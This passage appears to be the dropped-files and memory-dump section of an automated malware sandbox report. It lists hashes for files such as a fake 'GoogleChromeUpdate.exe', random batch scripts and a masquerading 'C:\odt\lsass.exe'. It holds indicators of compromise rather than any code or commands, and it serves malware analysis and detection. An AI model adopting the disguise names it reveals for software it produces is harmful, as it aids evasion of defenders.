            2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

            SHA512

            c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            bd5940f08d0be56e65e5f2aaf47c538e

            SHA1

            d7e31b87866e5e383ab5499da64aba50f03e8443

            SHA256

            2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

            SHA512

            c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            bd5940f08d0be56e65e5f2aaf47c538e

            SHA1

            d7e31b87866e5e383ab5499da64aba50f03e8443

            SHA256

            2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

            SHA512

            c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            5f0ddc7f3691c81ee14d17b419ba220d

            SHA1

            f0ef5fde8bab9d17c0b47137e014c91be888ee53

            SHA256

            a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

            SHA512

            2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            5f0ddc7f3691c81ee14d17b419ba220d

            SHA1

            f0ef5fde8bab9d17c0b47137e014c91be888ee53

            SHA256

            a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

            SHA512

            2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            e243a38635ff9a06c87c2a61a2200656

            SHA1

            ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

            SHA256

            af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

            SHA512

            4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            e243a38635ff9a06c87c2a61a2200656

            SHA1

            ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

            SHA256

            af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

            SHA512

            4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            7d9ecfe610b58440e18d2bffe5167d71

            SHA1

            7afeed064042ef5e614228f678a0c595699c3d84

            SHA256

            2c42082be2718281fe2a2bf0136bf417ff214ce7c36bc22a40d23adb1d026632

            SHA512

            017a63c4b81cd256adec796b9258fbae464d32af59cb654a81dd157e02896f50a252c25b6eac07fc6cb44a493b477e7debfaf9999c854dbd3fb34e24ef443c29

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cbc41bceec6e8cf6d23f68d952487858

            SHA1

            f52edbceff042ded7209e8be90ec5e09086d62eb

            SHA256

            b97a8a2a5dbc3c1b994affa4751e61e1ac6bddcf336a4c77ee96a3ce07c59f4d

            SHA512

            0f025ea2559e477c56500b9f4ecc251325793629cf1ae8d43ad783f1036b830c51757274b0aa8bb3183ac636cdfc1e0e8be1163a45695b8fb57df98c362534fb

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            20ccd8eee8fb63b0f660c38299f815d4

            SHA1

            5882e3b12448a5cd6ab57008c1be852ac84cade1

            SHA256

            cad714968818e2c4fec544ad7aa0faf5da04809f8efd1a8699d2861d0c0809e3

            SHA512

            28b87bd117a752ce699bd00c651c095dcfdb2a6cf71687177862c9062c3f73243ac32ac1b709804f940eef8c1f3e233593c73c4831449742c931d8c845c9fd8f

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            20ccd8eee8fb63b0f660c38299f815d4

            SHA1

            5882e3b12448a5cd6ab57008c1be852ac84cade1

            SHA256

            cad714968818e2c4fec544ad7aa0faf5da04809f8efd1a8699d2861d0c0809e3

            SHA512

            28b87bd117a752ce699bd00c651c095dcfdb2a6cf71687177862c9062c3f73243ac32ac1b709804f940eef8c1f3e233593c73c4831449742c931d8c845c9fd8f

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            20ccd8eee8fb63b0f660c38299f815d4

            SHA1

            5882e3b12448a5cd6ab57008c1be852ac84cade1

            SHA256

            cad714968818e2c4fec544ad7aa0faf5da04809f8efd1a8699d2861d0c0809e3

            SHA512

            28b87bd117a752ce699bd00c651c095dcfdb2a6cf71687177862c9062c3f73243ac32ac1b709804f940eef8c1f3e233593c73c4831449742c931d8c845c9fd8f

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            fd86c55419dcac3423864e0b93f54bef

            SHA1

            9868d6cc8332229c610002cd554d6cf13324b2de

            SHA256

            981dafd14ebbd0e40789a623c7f74770131706fbac0881f52339b752ed45eebb

            SHA512

            70d7a2e579ace5f00dbe51c409c138506215997f12dfb73c26ee51ab2267e84ccaeace74d76f7378a1519f3d8cb4d8dc082fe481379ecdbee17c6e9a6dbdfe58

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            a9a7f35c006bbf5da72f9cb250ffbddb

            SHA1

            458a8cedc38dac109631d9fccb3bf6d2c5c0e89e

            SHA256

            a1db56d56e35a6c95f98204e40f69f70422969681d408e5edc4afbf732eef86b

            SHA512

            d341773d30e09214567c65f24cd1854f1e438b8528aa30d35b6baac16e671dde1245edda654f19343b7c160da45985ab53f08453e7f6286e272d544f8741c131

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            89b9b22e2cb6f0b903e7f8755f49d7be

            SHA1

            e13b62b19dccdbacb5fec9227e34f21e34fe5cad

            SHA256

            17b31393e036af7d83e6ea288a0bbad0278c404f5e0698b3a28f2fa1faa99537

            SHA512

            f4817348aa7f297c7c81db010bc0ce09c9193c32f0f7c2b0592df0c7731921830b5a3868486f986edfd863d7d82815e67598392b94782b9d317b7066b9fb7064

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            89b9b22e2cb6f0b903e7f8755f49d7be

            SHA1

            e13b62b19dccdbacb5fec9227e34f21e34fe5cad

            SHA256

            17b31393e036af7d83e6ea288a0bbad0278c404f5e0698b3a28f2fa1faa99537

            SHA512

            f4817348aa7f297c7c81db010bc0ce09c9193c32f0f7c2b0592df0c7731921830b5a3868486f986edfd863d7d82815e67598392b94782b9d317b7066b9fb7064

          • C:\Users\Admin\AppData\Local\Temp\GoogleChromeUpdate\GoogleChromeUpdate.exe
            Filesize

            1.3MB

            MD5

            bced1e7139210b3cdd27938afeb88d8f

            SHA1

            06954c644d000863658b68dce36b6972f38da7d1

            SHA256

            d74aba28905fc35c7163604b9a807f289e00b0b28b4c88d06e308b4c977c1ea7

            SHA512

            310af594a2a744cb2e87aca3daeb2251d2219644bfc4f83fbcbce30119045fcbf68bd5a6ab318caa8090fd6598cc0de475c4687ae109458d71e11bf946df4b94

          • C:\Users\Admin\AppData\Local\Temp\GoogleChromeUpdate\GoogleChromeUpdate.exe
            Filesize

            1.3MB

            MD5

            bced1e7139210b3cdd27938afeb88d8f

            SHA1

            06954c644d000863658b68dce36b6972f38da7d1

            SHA256

            d74aba28905fc35c7163604b9a807f289e00b0b28b4c88d06e308b4c977c1ea7

            SHA512

            310af594a2a744cb2e87aca3daeb2251d2219644bfc4f83fbcbce30119045fcbf68bd5a6ab318caa8090fd6598cc0de475c4687ae109458d71e11bf946df4b94

          • C:\Users\Admin\AppData\Local\Temp\GoogleChromeUpdate\GoogleChromeUpdate.exe
            Filesize

            1.3MB

            MD5

            bced1e7139210b3cdd27938afeb88d8f

            SHA1

            06954c644d000863658b68dce36b6972f38da7d1

            SHA256

            d74aba28905fc35c7163604b9a807f289e00b0b28b4c88d06e308b4c977c1ea7

            SHA512

            310af594a2a744cb2e87aca3daeb2251d2219644bfc4f83fbcbce30119045fcbf68bd5a6ab318caa8090fd6598cc0de475c4687ae109458d71e11bf946df4b94

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uhmvywjj.rxw.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\mSSrp8dhrf.bat
            Filesize

            203B

            MD5

            c3284131e2e889437d1bf30d3bfa5d7d

            SHA1

            5e6eefa44a41153e47566fe729ac949e9c22cc8b

            SHA256

            5dc2a001f86a74eb15006cbc04c3aa63d106e3967406382f9c3c08c4a150a57d

            SHA512

            ad0ec62f1702d70633c23d99f2d257c29f69d76bdf69329dce5326cb591ef0f45af67d5afcc02ef1590a2bf7aeb8718e5c65444a9562aa6db947edfa428793b9

          • C:\Users\Admin\AppData\Local\Temp\ybAbNnqa15.bat
            Filesize

            181B

            MD5

            077bd061997e6d295c90d917570b1be2

            SHA1

            b4adf48246d2803bac0c47515a6f487ea1181183

            SHA256

            fef594639ed5ee1c0a96073e56251d11ef0748c72dcc347610111512501ee27b

            SHA512

            ef3c76162d420ef43a758bdf4eab85944c8db716c6a86d7875c743afba2ab3ae87963dae1f7fe6c5e82929472676eeb19b977b0bdc2b5f1c64ca4934e5bdf1cb

          • C:\odt\lsass.exe
            Filesize

            983KB

            MD5

            5defd0000aa1bf0805c8d2e2fc3ed20d

            SHA1

            e7a366a7a834e2ab3cabc3dd412f065c636b4efb

            SHA256

            fc11e2bbd6d3e8dce36393b3b00504ce8ed994e0498fffee0ce42d838ae51888

            SHA512

            e387cb219aec67da2eab62d7f091b8cad5b87cd971477f50c80ba263d009bc862ff272611a572de5cf51a27119e5ad0fae33cb9a4953b91768ed9252ebe84a7d

          • C:\odt\lsass.exe
            Filesize

            983KB

            MD5

            5defd0000aa1bf0805c8d2e2fc3ed20d

            SHA1

            e7a366a7a834e2ab3cabc3dd412f065c636b4efb

            SHA256

            fc11e2bbd6d3e8dce36393b3b00504ce8ed994e0498fffee0ce42d838ae51888

            SHA512

            e387cb219aec67da2eab62d7f091b8cad5b87cd971477f50c80ba263d009bc862ff272611a572de5cf51a27119e5ad0fae33cb9a4953b91768ed9252ebe84a7d

          • memory/1172-471-0x0000024DA7700000-0x0000024DA7710000-memory.dmp
            Filesize

            64KB

          • memory/1384-241-0x00000174AEAB0000-0x00000174AEAC0000-memory.dmp
            Filesize

            64KB

          • memory/1384-306-0x00000174AEAB0000-0x00000174AEAC0000-memory.dmp
            Filesize

            64KB

          • memory/1384-501-0x00000174AEAB0000-0x00000174AEAC0000-memory.dmp
            Filesize

            64KB

          • memory/1636-277-0x000002AE31090000-0x000002AE310A0000-memory.dmp
            Filesize

            64KB

          • memory/1740-476-0x0000020054800000-0x0000020054810000-memory.dmp
            Filesize

            64KB

          • memory/1740-477-0x0000020054800000-0x0000020054810000-memory.dmp
            Filesize

            64KB

          • memory/1780-432-0x000001C0607D0000-0x000001C0607E0000-memory.dmp
            Filesize

            64KB

          • memory/1780-473-0x000001C0607D0000-0x000001C0607E0000-memory.dmp
            Filesize

            64KB

          • memory/1936-479-0x000001D8485C0000-0x000001D8485D0000-memory.dmp
            Filesize

            64KB

          • memory/2228-447-0x000001E077C90000-0x000001E077CA0000-memory.dmp
            Filesize

            64KB

          • memory/2348-472-0x000001E546C70000-0x000001E546C80000-memory.dmp
            Filesize

            64KB

          • memory/2940-461-0x00000138DBB30000-0x00000138DBB40000-memory.dmp
            Filesize

            64KB

          • memory/2968-322-0x0000013FD38B0000-0x0000013FD38C0000-memory.dmp
            Filesize

            64KB

          • memory/3040-321-0x000001E476930000-0x000001E476940000-memory.dmp
            Filesize

            64KB

          • memory/3040-298-0x000001E476930000-0x000001E476940000-memory.dmp
            Filesize

            64KB

          • memory/3040-299-0x000001E476930000-0x000001E476940000-memory.dmp
            Filesize

            64KB

          • memory/3064-478-0x0000021978690000-0x00000219786A0000-memory.dmp
            Filesize

            64KB

          • memory/3124-185-0x00000184CD610000-0x00000184CD632000-memory.dmp
            Filesize

            136KB

          • memory/3124-314-0x00000184CD6A0000-0x00000184CD6B0000-memory.dmp
            Filesize

            64KB

          • memory/3124-251-0x00000184CD6A0000-0x00000184CD6B0000-memory.dmp
            Filesize

            64KB

          • memory/3124-261-0x00000184CD6A0000-0x00000184CD6B0000-memory.dmp
            Filesize

            64KB

          • memory/3124-502-0x00000184CD6A0000-0x00000184CD6B0000-memory.dmp
            Filesize

            64KB

          • memory/3156-158-0x0000000000D30000-0x0000000000E2E000-memory.dmp
            Filesize

            1016KB

          • memory/3156-159-0x000000001BB20000-0x000000001BB30000-memory.dmp
            Filesize

            64KB

          • memory/3388-293-0x000001EB71E70000-0x000001EB71E80000-memory.dmp
            Filesize

            64KB

          • memory/3388-294-0x000001EB71E70000-0x000001EB71E80000-memory.dmp
            Filesize

            64KB

          • memory/3548-271-0x0000022E40B90000-0x0000022E40BA0000-memory.dmp
            Filesize

            64KB

          • memory/3548-331-0x0000022E40B90000-0x0000022E40BA0000-memory.dmp
            Filesize

            64KB

          • memory/3576-474-0x000001E074530000-0x000001E074540000-memory.dmp
            Filesize

            64KB

          • memory/3576-475-0x000001E074530000-0x000001E074540000-memory.dmp
            Filesize

            64KB

          • memory/3848-295-0x0000021A8A4C0000-0x0000021A8A4D0000-memory.dmp
            Filesize

            64KB

          • memory/4132-344-0x0000000000F90000-0x0000000000FA0000-memory.dmp
            Filesize

            64KB

          • memory/4192-309-0x0000023CC83F0000-0x0000023CC8400000-memory.dmp
            Filesize

            64KB

          • memory/4192-296-0x0000023CC83F0000-0x0000023CC8400000-memory.dmp
            Filesize

            64KB

          • memory/4192-297-0x0000023CC83F0000-0x0000023CC8400000-memory.dmp
            Filesize

            64KB

          • memory/4520-320-0x00000241683D0000-0x00000241683E0000-memory.dmp
            Filesize

            64KB

          • memory/4520-328-0x00000241683D0000-0x00000241683E0000-memory.dmp
            Filesize

            64KB

          • memory/4688-480-0x000001D2D87D0000-0x000001D2D87E0000-memory.dmp
            Filesize

            64KB

          • memory/5092-327-0x000001204F960000-0x000001204F970000-memory.dmp
            Filesize

            64KB

          • memory/5092-315-0x000001204F960000-0x000001204F970000-memory.dmp
            Filesize

            64KB

          • memory/5092-503-0x000001204F960000-0x000001204F970000-memory.dmp
            Filesize

            64KB

          • memory/5092-282-0x000001204F960000-0x000001204F970000-memory.dmp
            Filesize

            64KB

          • memory/5092-288-0x000001204F960000-0x000001204F970000-memory.dmp
            Filesize

            64KB